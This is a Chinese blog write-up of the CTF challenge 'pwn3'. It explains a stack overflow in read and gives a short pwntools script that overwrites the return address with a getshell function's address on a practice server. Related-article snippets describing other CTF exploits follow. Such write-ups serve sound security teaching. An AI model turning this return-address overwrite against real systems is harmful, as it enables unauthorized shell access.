CTF_论剑场 pwn3

最新推荐文章于 2022-08-19 16:47:22 发布
最新推荐文章于 2022-08-19 16:47:22 发布
阅读量299 收藏
点赞数
分类专栏: CTF PWN CTF_论剑场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19635147/article/details/105556131
版权
CTF 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
CTF_论剑场
6 篇文章 0 订阅
订阅专栏
PWN
1 篇文章 0 订阅
订阅专栏

先把附件下载下来,然后checksec

checksec pwn3

然后IDA64打开

read函数存在栈溢出,然后重新里还有一个getshell函数。所以控制程序运行流程使它跳转到getshell函数就可以得到flag

from pwn import *
context(arch="amd64", os="linux")
p = remote("114.116.54.89", 10003)
p.recv()
p.sendline('a'*0x30+'a'*8+p64(0x0000000000400751))
p.interactive()
#get_shell_	.text	0000000000400751	00000025	00000008	00000000	R	.	.	.	B	.	.

 

这个不是名
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF练习平台pwn3(read_note)的writeup
只影的博客
03-05 1454
在Bugku的pwn题中,这道题分值最高,也是难度最大的一道。难点在于,第一要读懂题目找出漏洞,第二是要绕过各种保护机制,第三是exp的编写调试。看一眼程序的保护机制,发现除了RELRO所有保护全开,还是有点头疼的,毕竟我刚开始学pwn没几天,还没有做过PIE和Canary的题目,所以调试还是花了不少时间的。 首先分析程序,重要部分如下所示。一开始会让你输入一个路径,不存在的话就会报错推出,然后打...
最简单的*ctf-PWN
weixin_44319142的博客
05-02 776
babyshell 给的提示是 a easy shellcode 所以可以思考就是要写入shellcode 来看一下ida里面的情况 根据逻辑,只要让函数return 1,这样的话指针指向buf,buf里面写shellcode就会正常执行了 所以,这里要先进循环,然后截断使他可以return 1,然后下面写shellcode 这里用什么字符让他进入循环,并且可以使shellcode被正...
CTF_场(bugku新平台)部分题目write up
城南以南花亦开
03-31 2508
CTF_场(bugku新平台) 部分题目write up(1)头像签到0和1的故事最简单的pwnweb26web1这个人真的很高web9Snake进制转换流量分析ezsypdf 头像 使用WinHex打开图片,尝试搜索关键字“flag”,发现flag; 按照题目要求,使用所找到flag的md5 32位加密值进行验证,发现flag错误; 换个方式,将所找到flag先进行base64解码,...
西湖论 预选赛 pwn3 看 Largebin
qq_41071646的博客
07-21 267
参考链接 https://xz.aliyun.com/t/4791#toc-13 不得不说 这个博客写的很详细了。。。 建议去看 上面的链接 上面的链接写的 很详细 这个题 让我认识到了 Large bin 这个玩意真的很,,,,难 感觉比上面那两个难很多 一般来说 题目很少涉及 Large bin 涉及的题目一般都会禁止 fastbin if ( !mall...
CTF_场 misc杂项 WriteUp(持续更新)
qq_41995976的博客
05-19 9756
签到题 提交这里的flag即可 Snake 开始游戏要先注册 登录后发现是一个贪吃蛇游戏 并且题干里说要攒够500分就可获得flag 一开始思路是逆向工程 然后找flag 但是根据经验( 并且电脑里正好有CE 就使用CE来改分数了 但是发现改了分数之后的flag为乱码…… 于是又搞了一会儿 发现是长度的问题…… 于是把长度和分数一起修改: 成功获得了flag 之后的再做了之后更新 ...
CTF_场 Web WriteUp(持续更新)
qq_41995976的博客
05-19 6319
文章目录web1web9流量分析web2web5web6web11web13日志审计web20 web1 利用的是变量覆盖漏洞 http://www.mamicode.com/info-detail-2314166.html payload:http://123.206.31.85:10001/?a=&c=aaaaa web9 题干: 要求你PUT一串信息"bugku" 才能获得flag...
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2586
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
CTF论场 misc 名侦探柯南
weixin_41216733的博客
10-08 538
1、下载后为图片,常见套路steg和foremost,但是两个都不行,放到kali中,用binwalk看看 发现有rar,分离出来后 图片的长和宽不同,所以修改试试,果然,发现底下有字 当然是爆破啦,难道还要百度,这里其实是一个诱导,我们完全可以先用数字爆破压缩包,或者和题目相关的东西,既然走到这里了就继续吧! 解压后为gif,闪的我眼睛疼,妹的,还小的不行,cnmd。 里面就有flag ...
格式化字符漏洞 tamuCTF pwn3 writeup
charlie_heng的专栏
06-05 1003
之前一直不怎么会格式化字符串的漏洞,刚好碰上这道题,学习一波首先看下main函数,读一个字符串,然后打印出来,之后直接exit(0) 无法利用栈溢出跳转,但是prinf是直接打印读取的东西,这里就存在一个格式化字符串漏洞。 这里推荐一个格式化字符串漏洞入门的教程: http://codearcana.com/posts/2013/05/02/introduction-to-format-stri
CCTF-pwn3-printf
leeham的博客
09-08 2221
CCTF-pwn3-printf 开始做“实验吧”里边的溢出题目:printf 文件解压缩之后发现里边的压缩包名为cctf-2016-pwn,于是之后就一直看cctf-2016-pwn这题的思路。 当前的结果是: 可以通过题目压缩包中的pwn-ELF文件拿到本地Shell,但是连接到服务器上就不行了……目前仍在解决当中;而且复制粘贴已有的expoit只能获取到服务器上的shell,无法获取...
ctf论场web25
elsa________的博客
04-05 231
ctf论场web25 题目地址:http://123.206.31.85:10025/ 要我们输入一些东西,随便输入一点,没有什么思路, 点进入下面的链接,点进去发现有一个下载链接发现点击下载不了,查看源代码 把/2去掉试试,发现可以有几行字符串 在这里插入图片描述 暂时没有什么思路了,用dirsearch扫一下目录: python dirsearch.py -u “http://123....
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 5906
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
ctfshow pwn3
qq_39980610的博客
08-19 523
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。然后接受到的地址就是程序在libc中的地址我们就可以确定libc的版本和libc基址。函数在libc中的偏移都是固定的我们可以通过基址加偏移拿到函数地址和binsh字段。然后我们再构造rop链。
Bugku新平台论场writeup
热门推荐
a370793934的专栏
11-28 1万+
头像 用010editor打开搜索flag就是找到的flag:flag{bGxvdmV0aGVnaXJs}再经过base64解密flag{llovethegirl}后再来进行MD5加密得到 flag{8ba484e0a0e0a5ee4ffcb791385ddf25} 签到 签个到吧 flag{abcdABCD1234} 0和1的故事 解压后有flag{}.txt文件,用1...
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值